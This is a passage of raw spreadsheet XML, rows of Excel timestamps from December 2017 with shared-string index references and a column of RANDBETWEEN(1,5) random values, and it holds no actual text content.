      <c r="C20965" t="s">
        <v>71</v>
      </c>
      <c r="E20965" s="2" t="s">
        <v>18877</v>
      </c>
      <c r="F20965">
        <f t="shared" ca="1" si="327"/>
        <v>4</v>
      </c>
    </row>
    <row r="20966" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A20966" s="1">
        <v>43097.048576388886</v>
      </c>
      <c r="C20966" t="s">
        <v>73</v>
      </c>
      <c r="E20966" s="2" t="s">
        <v>18878</v>
      </c>
      <c r="F20966">
        <f t="shared" ca="1" si="327"/>
        <v>2</v>
      </c>
    </row>
    <row r="20967" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20967" s="1">
        <v>43096.933703703704</v>
      </c>
      <c r="C20967" t="s">
        <v>41</v>
      </c>
      <c r="E20967" s="2" t="s">
        <v>18879</v>
      </c>
      <c r="F20967">
        <f t="shared" ca="1" si="327"/>
        <v>1</v>
      </c>
    </row>
    <row r="20968" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20968" s="1">
        <v>43096.870555555557</v>
      </c>
      <c r="C20968" t="s">
        <v>10</v>
      </c>
      <c r="D20968" t="s">
        <v>151</v>
      </c>
      <c r="E20968" t="s">
        <v>18880</v>
      </c>
      <c r="F20968">
        <f t="shared" ca="1" si="327"/>
        <v>4</v>
      </c>
    </row>
    <row r="20969" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20969" s="1">
        <v>43096.851886574077</v>
      </c>
      <c r="C20969" t="s">
        <v>314</v>
      </c>
      <c r="E20969" t="s">
        <v>18881</v>
      </c>
      <c r="F20969">
        <f t="shared" ca="1" si="327"/>
        <v>1</v>
      </c>
    </row>
    <row r="20970" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20970" s="1">
        <v>43096.807303240741</v>
      </c>
      <c r="C20970" t="s">
        <v>10</v>
      </c>
      <c r="D20970" t="s">
        <v>6</v>
      </c>
      <c r="E20970" t="s">
        <v>18882</v>
      </c>
      <c r="F20970">
        <f t="shared" ca="1" si="327"/>
        <v>2</v>
      </c>
    </row>
    <row r="20971" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20971" s="1">
        <v>43096.747430555559</v>
      </c>
      <c r="C20971" t="s">
        <v>10</v>
      </c>
      <c r="D20971" t="s">
        <v>89</v>
      </c>
      <c r="E20971" t="s">
        <v>18883</v>
      </c>
      <c r="F20971">
        <f t="shared" ca="1" si="327"/>
        <v>5</v>
      </c>
    </row>
    <row r="20972" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20972" s="1">
        <v>43096.668425925927</v>
      </c>
      <c r="C20972" t="s">
        <v>10</v>
      </c>
      <c r="D20972" t="s">
        <v>494</v>
      </c>
      <c r="E20972" s="2" t="s">
        <v>18884</v>
      </c>
      <c r="F20972">
        <f t="shared" ca="1" si="327"/>
        <v>2</v>
      </c>
    </row>
    <row r="20973" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20973" s="1">
        <v>43096.642893518518</v>
      </c>
      <c r="C20973" t="s">
        <v>10</v>
      </c>
      <c r="D20973" t="s">
        <v>6</v>
      </c>
      <c r="E20973" t="s">
        <v>18885</v>
      </c>
      <c r="F20973">
        <f t="shared" ca="1" si="327"/>
        <v>5</v>
      </c>
    </row>
    <row r="20974" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A20974" s="1">
        <v>43096.617060185185</v>
      </c>
      <c r="C20974" t="s">
        <v>6663</v>
      </c>
      <c r="D20974" t="s">
        <v>817</v>
      </c>
      <c r="E20974" s="2" t="s">
        <v>18886</v>
      </c>
      <c r="F20974">
        <f t="shared" ca="1" si="327"/>
        <v>4</v>
      </c>
    </row>
    <row r="20975" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A20975" s="1">
        <v>43096.612280092595</v>
      </c>
      <c r="C20975" t="s">
        <v>10</v>
      </c>
      <c r="D20975" t="s">
        <v>290</v>
      </c>
      <c r="E20975" s="2" t="s">
        <v>18887</v>
      </c>
      <c r="F20975">
        <f t="shared" ca="1" si="327"/>
        <v>1</v>
      </c>
    </row>
    <row r="20976" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20976" s="1">
        <v>43096.585752314815</v>
      </c>
      <c r="C20976" t="s">
        <v>10</v>
      </c>
      <c r="D20976" t="s">
        <v>6</v>
      </c>
      <c r="E20976" t="s">
        <v>18888</v>
      </c>
      <c r="F20976">
        <f t="shared" ca="1" si="327"/>
        <v>3</v>
      </c>
    </row>
    <row r="20977" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A20977" s="1">
        <v>43096.542164351849</v>
      </c>
      <c r="C20977" t="s">
        <v>10</v>
      </c>
      <c r="D20977" t="s">
        <v>6</v>
      </c>
      <c r="E20977" s="2" t="s">
        <v>18889</v>
      </c>
      <c r="F20977">
        <f t="shared" ca="1" si="327"/>
        <v>3</v>
      </c>
    </row>
    <row r="20978" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20978" s="1">
        <v>43096.534456018519</v>
      </c>
      <c r="C20978" t="s">
        <v>10</v>
      </c>
      <c r="D20978" t="s">
        <v>192</v>
      </c>
      <c r="E20978" t="s">
        <v>18890</v>
      </c>
      <c r="F20978">
        <f t="shared" ca="1" si="327"/>
        <v>5</v>
      </c>
    </row>
    <row r="20979" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20979" s="1">
        <v>43096.485763888886</v>
      </c>
      <c r="C20979" t="s">
        <v>10</v>
      </c>
      <c r="D20979" t="s">
        <v>11</v>
      </c>
      <c r="E20979" s="2" t="s">
        <v>18891</v>
      </c>
      <c r="F20979">
        <f t="shared" ca="1" si="327"/>
        <v>4</v>
      </c>
    </row>
    <row r="20980" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A20980" s="1">
        <v>43096.484259259261</v>
      </c>
      <c r="C20980" t="s">
        <v>107</v>
      </c>
      <c r="E20980" s="2" t="s">
        <v>18892</v>
      </c>
      <c r="F20980">
        <f t="shared" ca="1" si="327"/>
        <v>2</v>
      </c>
    </row>
    <row r="20981" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20981" s="1">
        <v>43096.463773148149</v>
      </c>
      <c r="C20981" t="s">
        <v>10</v>
      </c>
      <c r="D20981" t="s">
        <v>192</v>
      </c>
      <c r="E20981" t="s">
        <v>18893</v>
      </c>
      <c r="F20981">
        <f t="shared" ca="1" si="327"/>
        <v>4</v>
      </c>
    </row>
    <row r="20982" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20982" s="1">
        <v>43096.453101851854</v>
      </c>
      <c r="C20982" t="s">
        <v>10</v>
      </c>
      <c r="D20982" t="s">
        <v>112</v>
      </c>
      <c r="E20982" t="s">
        <v>18894</v>
      </c>
      <c r="F20982">
        <f t="shared" ca="1" si="327"/>
        <v>1</v>
      </c>
    </row>
    <row r="20983" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A20983" s="1">
        <v>43096.436296296299</v>
      </c>
      <c r="C20983" t="s">
        <v>65</v>
      </c>
      <c r="E20983" s="2" t="s">
        <v>18895</v>
      </c>
      <c r="F20983">
        <f t="shared" ca="1" si="327"/>
        <v>5</v>
      </c>
    </row>
    <row r="20984" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20984" s="1">
        <v>43096.411226851851</v>
      </c>
      <c r="C20984" t="s">
        <v>10</v>
      </c>
      <c r="D20984" t="s">
        <v>112</v>
      </c>
      <c r="E20984" s="2" t="s">
        <v>18896</v>
      </c>
      <c r="F20984">
        <f t="shared" ca="1" si="327"/>
        <v>3</v>
      </c>
    </row>
    <row r="20985" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A20985" s="1">
        <v>43096.286585648151</v>
      </c>
      <c r="C20985" t="s">
        <v>43</v>
      </c>
      <c r="E20985" s="2" t="s">
        <v>18897</v>
      </c>
      <c r="F20985">
        <f t="shared" ca="1" si="327"/>
        <v>2</v>
      </c>
    </row>
    <row r="20986" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20986" s="1">
        <v>43096.245011574072</v>
      </c>
      <c r="C20986" t="s">
        <v>461</v>
      </c>
      <c r="E20986" s="2" t="s">
        <v>18898</v>
      </c>
      <c r="F20986">
        <f t="shared" ca="1" si="327"/>
        <v>5</v>
      </c>
    </row>
    <row r="20987" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A20987" s="1">
        <v>43096.233657407407</v>
      </c>
      <c r="C20987" t="s">
        <v>41</v>
      </c>
      <c r="E20987" s="2" t="s">
        <v>18899</v>
      </c>
      <c r="F20987">
        <f t="shared" ca="1" si="327"/>
        <v>4</v>
      </c>
    </row>
    <row r="20988" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20988" s="1">
        <v>43096.177303240744</v>
      </c>
      <c r="C20988" t="s">
        <v>1050</v>
      </c>
      <c r="E20988" t="s">
        <v>18900</v>
      </c>
      <c r="F20988">
        <f t="shared" ca="1" si="327"/>
        <v>4</v>
      </c>
    </row>
    <row r="20989" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20989" s="1">
        <v>43096.034780092596</v>
      </c>
      <c r="C20989" t="s">
        <v>41</v>
      </c>
      <c r="E20989" t="s">
        <v>18901</v>
      </c>
      <c r="F20989">
        <f t="shared" ca="1" si="327"/>
        <v>1</v>
      </c>
    </row>
    <row r="20990" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20990" s="1">
        <v>43096.029050925928</v>
      </c>
      <c r="C20990" t="s">
        <v>139</v>
      </c>
      <c r="E20990" t="s">
        <v>18902</v>
      </c>
      <c r="F20990">
        <f t="shared" ca="1" si="327"/>
        <v>4</v>
      </c>
    </row>
    <row r="20991" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20991" s="1">
        <v>43096.002430555556</v>
      </c>
      <c r="C20991" t="s">
        <v>318</v>
      </c>
      <c r="E20991" s="2" t="s">
        <v>18903</v>
      </c>
      <c r="F20991">
        <f t="shared" ca="1" si="327"/>
        <v>4</v>
      </c>
    </row>
    <row r="20992" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20992" s="1">
        <v>43095.999965277777</v>
      </c>
      <c r="C20992" t="s">
        <v>471</v>
      </c>
      <c r="E20992" t="s">
        <v>18904</v>
      </c>
      <c r="F20992">
        <f t="shared" ca="1" si="327"/>
        <v>4</v>
      </c>
    </row>
    <row r="20993" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A20993" s="1">
        <v>43095.924641203703</v>
      </c>
      <c r="C20993" t="s">
        <v>7636</v>
      </c>
      <c r="D20993" t="s">
        <v>263</v>
      </c>
      <c r="E20993" s="2" t="s">
        <v>18905</v>
      </c>
      <c r="F20993">
        <f t="shared" ca="1" si="327"/>
        <v>3</v>
      </c>
    </row>
    <row r="20994" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20994" s="1">
        <v>43095.828263888892</v>
      </c>
      <c r="C20994" t="s">
        <v>2428</v>
      </c>
      <c r="F20994">
        <f t="shared" ref="F20994:F21057" ca="1" si="328">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="20995" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20995" s="1">
        <v>43095.71429398148</v>
      </c>
      <c r="C20995" t="s">
        <v>10</v>
      </c>
      <c r="D20995" t="s">
        <v>6</v>
      </c>
      <c r="E20995" t="s">
        <v>18906</v>
      </c>
      <c r="F20995">
        <f t="shared" ca="1" si="328"/>
        <v>3</v>
      </c>
    </row>
    <row r="20996" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20996" s="1">
        <v>43095.673680555556</v>
      </c>
      <c r="C20996" t="s">
        <v>10</v>
      </c>
      <c r="D20996" t="s">
        <v>86</v>
      </c>
      <c r="E20996" t="s">
        <v>18907</v>
      </c>
      <c r="F20996">
        <f t="shared" ca="1" si="328"/>
        <v>5</v>
      </c>
    </row>
    <row r="20997" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20997" s="1">
        <v>43095.322175925925</v>
      </c>
      <c r="C20997" t="s">
        <v>166</v>
      </c>
      <c r="E20997" t="s">
        <v>18908</v>
      </c>
      <c r="F20997">
        <f t="shared" ca="1" si="328"/>
        <v>4</v>
      </c>
    </row>
    <row r="20998" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20998" s="1">
        <v>43095.309803240743</v>
      </c>
      <c r="C20998" t="s">
        <v>63</v>
      </c>
      <c r="E20998" t="s">
        <v>18909</v>
      </c>
      <c r="F20998">
        <f t="shared" ca="1" si="328"/>
        <v>3</v>
      </c>
    </row>
    <row r="20999" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20999" s="1">
        <v>43095.283576388887</v>
      </c>
      <c r="C20999" t="s">
        <v>6</v>
      </c>
      <c r="D20999" t="s">
        <v>25</v>
      </c>
      <c r="E20999" t="s">
        <v>18910</v>
      </c>
      <c r="F20999">
        <f t="shared" ca="1" si="328"/>
        <v>2</v>
      </c>
    </row>
    <row r="21000" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21000" s="1">
        <v>43094.972650462965</v>
      </c>
      <c r="C21000" t="s">
        <v>410</v>
      </c>
      <c r="E21000" t="s">
        <v>18911</v>
      </c>
      <c r="F21000">
        <f t="shared" ca="1" si="328"/>
        <v>3</v>
      </c>
    </row>
    <row r="21001" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A21001" s="1">
        <v>43094.896377314813</v>
      </c>
      <c r="C21001" t="s">
        <v>73</v>
      </c>
      <c r="E21001" s="2" t="s">
        <v>18912</v>
      </c>
      <c r="F21001">
        <f t="shared" ca="1" si="328"/>
        <v>4</v>
      </c>
    </row>
    <row r="21002" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A21002" s="1">
        <v>43094.860474537039</v>
      </c>
      <c r="C21002" t="s">
        <v>318</v>
      </c>
      <c r="D21002" t="s">
        <v>80</v>
      </c>
      <c r="E21002" s="2" t="s">
        <v>18913</v>
      </c>
      <c r="F21002">
        <f t="shared" ca="1" si="328"/>
        <v>5</v>
      </c>
    </row>
    <row r="21003" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A21003" s="1">
        <v>43094.814618055556</v>
      </c>
      <c r="C21003" t="s">
        <v>318</v>
      </c>
      <c r="D21003" t="s">
        <v>336</v>
      </c>
      <c r="E21003" s="2" t="s">
        <v>18913</v>
      </c>
      <c r="F21003">
        <f t="shared" ca="1" si="328"/>
        <v>5</v>
      </c>
    </row>
    <row r="21004" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A21004" s="1">
        <v>43094.779120370367</v>
      </c>
      <c r="C21004" t="s">
        <v>318</v>
      </c>
      <c r="D21004" t="s">
        <v>290</v>
      </c>
      <c r="E21004" s="2" t="s">
        <v>18913</v>
      </c>
      <c r="F21004">
        <f t="shared" ca="1" si="328"/>
        <v>5</v>
      </c>
    </row>
    <row r="21005" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A21005" s="1">
        <v>43094.582268518519</v>
      </c>
      <c r="C21005" t="s">
        <v>2172</v>
      </c>
      <c r="D21005" t="s">
        <v>36</v>
      </c>
      <c r="E21005" s="2" t="s">
        <v>18914</v>
      </c>
      <c r="F21005">
        <f t="shared" ca="1" si="328"/>
        <v>5</v>
      </c>
    </row>
    <row r="21006" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21006" s="1">
        <v>43094.434664351851</v>
      </c>
      <c r="C21006" t="s">
        <v>65</v>
      </c>
      <c r="E21006" t="s">
        <v>18915</v>
      </c>
      <c r="F21006">
        <f t="shared" ca="1" si="328"/>
        <v>5</v>
      </c>
    </row>
    <row r="21007" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21007" s="1">
        <v>43094.243171296293</v>
      </c>
      <c r="C21007" t="s">
        <v>318</v>
      </c>
      <c r="F21007">
        <f t="shared" ca="1" si="328"/>
        <v>1</v>
      </c>
    </row>
    <row r="21008" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A21008" s="1">
        <v>43094.154108796298</v>
      </c>
      <c r="C21008" t="s">
        <v>7058</v>
      </c>
      <c r="E21008" s="2" t="s">
        <v>18916</v>
      </c>
      <c r="F21008">
        <f t="shared" ca="1" si="328"/>
        <v>4</v>
      </c>
    </row>
    <row r="21009" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21009" s="1">
        <v>43094.052395833336</v>
      </c>
      <c r="C21009" t="s">
        <v>477</v>
      </c>
      <c r="E21009" t="s">
        <v>18917</v>
      </c>
      <c r="F21009">
        <f t="shared" ca="1" si="328"/>
        <v>1</v>
      </c>
    </row>
    <row r="21010" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A21010" s="1">
        <v>43094.016921296294</v>
      </c>
      <c r="C21010" t="s">
        <v>319</v>
      </c>
      <c r="E21010" s="2" t="s">
        <v>18918</v>
      </c>
      <c r="F21010">
        <f t="shared" ca="1" si="328"/>
        <v>3</v>
      </c>
    </row>
    <row r="21011" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21011" s="1">
        <v>43094.013958333337</v>
      </c>
      <c r="C21011" t="s">
        <v>10</v>
      </c>
      <c r="D21011" t="s">
        <v>222</v>
      </c>
      <c r="E21011" t="s">
        <v>18919</v>
      </c>
      <c r="F21011">
        <f t="shared" ca="1" si="328"/>
        <v>5</v>
      </c>
    </row>
    <row r="21012" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A21012" s="1">
        <v>43093.819791666669</v>
      </c>
      <c r="C21012" t="s">
        <v>41</v>
      </c>
      <c r="E21012" s="2" t="s">
        <v>18920</v>
      </c>
      <c r="F21012">
        <f t="shared" ca="1" si="328"/>
        <v>5</v>
      </c>
    </row>
    <row r="21013" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A21013" s="1">
        <v>43093.476817129631</v>
      </c>
      <c r="C21013" t="s">
        <v>1068</v>
      </c>
      <c r="D21013" t="s">
        <v>107</v>
      </c>
      <c r="E21013" s="2" t="s">
        <v>18921</v>
      </c>
      <c r="F21013">
        <f t="shared" ca="1" si="328"/>
        <v>1</v>
      </c>
    </row>
    <row r="21014" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A21014" s="1">
        <v>43093.316192129627</v>
      </c>
      <c r="C21014" t="s">
        <v>6</v>
      </c>
      <c r="D21014" t="s">
        <v>7</v>
      </c>
      <c r="E21014" s="2" t="s">
        <v>18922</v>
      </c>
      <c r="F21014">
        <f t="shared" ca="1" si="328"/>
        <v>2</v>
      </c>
    </row>
    <row r="21015" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21015" s="1">
        <v>43092.434537037036</v>
      </c>
      <c r="C21015" t="s">
        <v>10</v>
      </c>
      <c r="D21015" t="s">
        <v>192</v>
      </c>
      <c r="E21015" t="s">
        <v>18923</v>
      </c>
      <c r="F21015">
        <f t="shared" ca="1" si="328"/>
        <v>2</v>
      </c>
    </row>
    <row r="21016" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A21016" s="1">
        <v>43092.376539351855</v>
      </c>
      <c r="C21016" t="s">
        <v>8872</v>
      </c>
      <c r="D21016" t="s">
        <v>20</v>
      </c>
      <c r="E21016" s="2" t="s">
        <v>18924</v>
      </c>
      <c r="F21016">
        <f t="shared" ca="1" si="328"/>
        <v>1</v>
      </c>
    </row>
    <row r="21017" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21017" s="1">
        <v>43091.857997685183</v>
      </c>
      <c r="C21017" t="s">
        <v>260</v>
      </c>
      <c r="E21017" s="2" t="s">
        <v>18925</v>
      </c>
      <c r="F21017">
        <f t="shared" ca="1" si="328"/>
        <v>3</v>
      </c>
    </row>
    <row r="21018" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21018" s="1">
        <v>43091.72960648148</v>
      </c>
      <c r="C21018" t="s">
        <v>6</v>
      </c>
      <c r="D21018" t="s">
        <v>25</v>
      </c>
      <c r="E21018" t="s">
        <v>18926</v>
      </c>
      <c r="F21018">
        <f t="shared" ca="1" si="328"/>
        <v>3</v>
      </c>
    </row>
    <row r="21019" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21019" s="1">
        <v>43091.630347222221</v>
      </c>
      <c r="C21019" t="s">
        <v>10</v>
      </c>
      <c r="D21019" t="s">
        <v>6</v>
      </c>
      <c r="E21019" t="s">
        <v>18927</v>
      </c>
      <c r="F21019">
        <f t="shared" ca="1" si="328"/>
        <v>3</v>
      </c>
    </row>
    <row r="21020" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21020" s="1">
        <v>43091.544340277775</v>
      </c>
      <c r="C21020" t="s">
        <v>10</v>
      </c>
      <c r="D21020" t="s">
        <v>107</v>
      </c>
      <c r="E21020" t="s">
        <v>18928</v>
      </c>
      <c r="F21020">
        <f t="shared" ca="1" si="328"/>
        <v>4</v>
      </c>
    </row>
    <row r="21021" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21021" s="1">
        <v>43091.522905092592</v>
      </c>
      <c r="C21021" t="s">
        <v>10</v>
      </c>
      <c r="D21021" t="s">
        <v>6</v>
      </c>
      <c r="F21021">
        <f t="shared" ca="1" si="328"/>
        <v>2</v>
      </c>
    </row>
    <row r="21022" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21022" s="1">
        <v>43091.522824074076</v>
      </c>
      <c r="C21022" t="s">
        <v>10</v>
      </c>
      <c r="D21022" t="s">
        <v>1056</v>
      </c>
      <c r="E21022" t="s">
        <v>18929</v>
      </c>
      <c r="F21022">
        <f t="shared" ca="1" si="328"/>
        <v>3</v>
      </c>
    </row>
    <row r="21023" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A21023" s="1">
        <v>43091.489004629628</v>
      </c>
      <c r="C21023" t="s">
        <v>6</v>
      </c>
      <c r="D21023" t="s">
        <v>602</v>
      </c>
      <c r="E21023" s="2" t="s">
        <v>18930</v>
      </c>
      <c r="F21023">
        <f t="shared" ca="1" si="328"/>
        <v>1</v>
      </c>
    </row>
    <row r="21024" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21024" s="1">
        <v>43091.483194444445</v>
      </c>
      <c r="C21024" t="s">
        <v>10</v>
      </c>
      <c r="D21024" t="s">
        <v>52</v>
      </c>
      <c r="E21024" t="s">
        <v>18931</v>
      </c>
      <c r="F21024">
        <f t="shared" ca="1" si="328"/>
        <v>5</v>
      </c>
    </row>
    <row r="21025" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21025" s="1">
        <v>43091.474490740744</v>
      </c>
      <c r="C21025" t="s">
        <v>10</v>
      </c>
      <c r="D21025" t="s">
        <v>17</v>
      </c>
      <c r="E21025" t="s">
        <v>18932</v>
      </c>
      <c r="F21025">
        <f t="shared" ca="1" si="328"/>
        <v>4</v>
      </c>
    </row>
    <row r="21026" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A21026" s="1">
        <v>43091.403854166667</v>
      </c>
      <c r="C21026" t="s">
        <v>71</v>
      </c>
      <c r="E21026" s="2" t="s">
        <v>18933</v>
      </c>
      <c r="F21026">
        <f t="shared" ca="1" si="328"/>
        <v>5</v>
      </c>
    </row>
    <row r="21027" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A21027" s="1">
        <v>43091.381736111114</v>
      </c>
      <c r="C21027" t="s">
        <v>41</v>
      </c>
      <c r="E21027" s="2" t="s">
        <v>18934</v>
      </c>
      <c r="F21027">
        <f t="shared" ca="1" si="328"/>
        <v>5</v>
      </c>
    </row>
    <row r="21028" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21028" s="1">
        <v>43091.374386574076</v>
      </c>
      <c r="C21028" t="s">
        <v>41</v>
      </c>
      <c r="E21028" t="s">
        <v>18935</v>
      </c>
      <c r="F21028">
        <f t="shared" ca="1" si="328"/>
        <v>1</v>
      </c>
    </row>
    <row r="21029" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21029" s="1">
        <v>43091.368819444448</v>
      </c>
      <c r="C21029" t="s">
        <v>71</v>
      </c>
      <c r="E21029" t="s">
        <v>18936</v>
      </c>
      <c r="F21029">
        <f t="shared" ca="1" si="328"/>
        <v>1</v>
      </c>
    </row>
    <row r="21030" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21030" s="1">
        <v>43091.348958333336</v>
      </c>
      <c r="C21030" t="s">
        <v>16</v>
      </c>
      <c r="E21030" t="s">
        <v>18937</v>
      </c>
      <c r="F21030">
        <f t="shared" ca="1" si="328"/>
        <v>1</v>
      </c>
    </row>
    <row r="21031" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A21031" s="1">
        <v>43091.279803240737</v>
      </c>
      <c r="C21031" t="s">
        <v>48</v>
      </c>
      <c r="E21031" s="2" t="s">
        <v>18938</v>
      </c>
      <c r="F21031">
        <f t="shared" ca="1" si="328"/>
        <v>5</v>
      </c>
    </row>
    <row r="21032" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A21032" s="1">
        <v>43091.169664351852</v>
      </c>
      <c r="C21032" t="s">
        <v>71</v>
      </c>
      <c r="E21032" s="2" t="s">
        <v>18939</v>
      </c>
      <c r="F21032">
        <f t="shared" ca="1" si="328"/>
        <v>2</v>
      </c>
    </row>
    <row r="21033" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21033" s="1">
        <v>43091.161469907405</v>
      </c>
      <c r="C21033" t="s">
        <v>48</v>
      </c>
      <c r="E21033" t="s">
        <v>18940</v>
      </c>
      <c r="F21033">
        <f t="shared" ca="1" si="328"/>
        <v>3</v>
      </c>
    </row>
    <row r="21034" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21034" s="1">
        <v>43091.157592592594</v>
      </c>
      <c r="C21034" t="s">
        <v>147</v>
      </c>
      <c r="E21034" t="s">
        <v>18941</v>
      </c>
      <c r="F21034">
        <f t="shared" ca="1" si="328"/>
        <v>2</v>
      </c>
    </row>
    <row r="21035" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A21035" s="1">
        <v>43091.108020833337</v>
      </c>
      <c r="C21035" t="s">
        <v>10</v>
      </c>
      <c r="D21035" t="s">
        <v>271</v>
      </c>
      <c r="E21035" s="2" t="s">
        <v>18942</v>
      </c>
      <c r="F21035">
        <f t="shared" ca="1" si="328"/>
        <v>3</v>
      </c>
    </row>
    <row r="21036" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A21036" s="1">
        <v>43091.070138888892</v>
      </c>
      <c r="C21036" t="s">
        <v>41</v>
      </c>
      <c r="E21036" s="2" t="s">
        <v>18943</v>
      </c>
      <c r="F21036">
        <f t="shared" ca="1" si="328"/>
        <v>3</v>
      </c>
    </row>
    <row r="21037" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A21037" s="1">
        <v>43091.025358796294</v>
      </c>
      <c r="C21037" t="s">
        <v>10</v>
      </c>
      <c r="D21037" t="s">
        <v>36</v>
      </c>
      <c r="E21037" s="2" t="s">
        <v>18944</v>
      </c>
      <c r="F21037">
        <f t="shared" ca="1" si="328"/>
        <v>2</v>
      </c>
    </row>
    <row r="21038" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21038" s="1">
        <v>43090.862175925926</v>
      </c>
      <c r="C21038" t="s">
        <v>10</v>
      </c>
      <c r="D21038" t="s">
        <v>271</v>
      </c>
      <c r="E21038" t="s">
        <v>18945</v>
      </c>
      <c r="F21038">
        <f t="shared" ca="1" si="328"/>
        <v>4</v>
      </c>
    </row>
    <row r="21039" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21039" s="1">
        <v>43090.654178240744</v>
      </c>
      <c r="C21039" t="s">
        <v>48</v>
      </c>
      <c r="E21039" t="s">
        <v>18946</v>
      </c>
      <c r="F21039">
        <f t="shared" ca="1" si="328"/>
        <v>3</v>
      </c>
    </row>
    <row r="21040" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21040" s="1">
        <v>43090.537997685184</v>
      </c>
      <c r="C21040" t="s">
        <v>10</v>
      </c>
      <c r="D21040" t="s">
        <v>46</v>
      </c>
      <c r="E21040" t="s">
        <v>18947</v>
      </c>
      <c r="F21040">
        <f t="shared" ca="1" si="328"/>
        <v>1</v>
      </c>
    </row>
    <row r="21041" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21041" s="1">
        <v>43090.528587962966</v>
      </c>
      <c r="C21041" t="s">
        <v>10</v>
      </c>
      <c r="D21041" t="s">
        <v>6</v>
      </c>
      <c r="E21041" t="s">
        <v>18948</v>
      </c>
      <c r="F21041">
        <f t="shared" ca="1" si="328"/>
        <v>2</v>
      </c>
    </row>
    <row r="21042" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21042" s="1">
        <v>43090.517893518518</v>
      </c>
      <c r="C21042" t="s">
        <v>10</v>
      </c>
      <c r="D21042" t="s">
        <v>6</v>
      </c>
      <c r="E21042" t="s">
        <v>18949</v>
      </c>
      <c r="F21042">
        <f t="shared" ca="1" si="328"/>
        <v>4</v>
      </c>
    </row>
    <row r="21043" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A21043" s="1">
        <v>43090.423576388886</v>
      </c>
      <c r="C21043" t="s">
        <v>10</v>
      </c>
      <c r="D21043" t="s">
        <v>6</v>
      </c>
      <c r="E21043" s="2" t="s">
        <v>18950</v>
      </c>
      <c r="F21043">
        <f t="shared" ca="1" si="328"/>
        <v>1</v>
      </c>
    </row>
    <row r="21044" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21044" s="1">
        <v>43090.386377314811</v>
      </c>
      <c r="C21044" t="s">
        <v>10</v>
      </c>
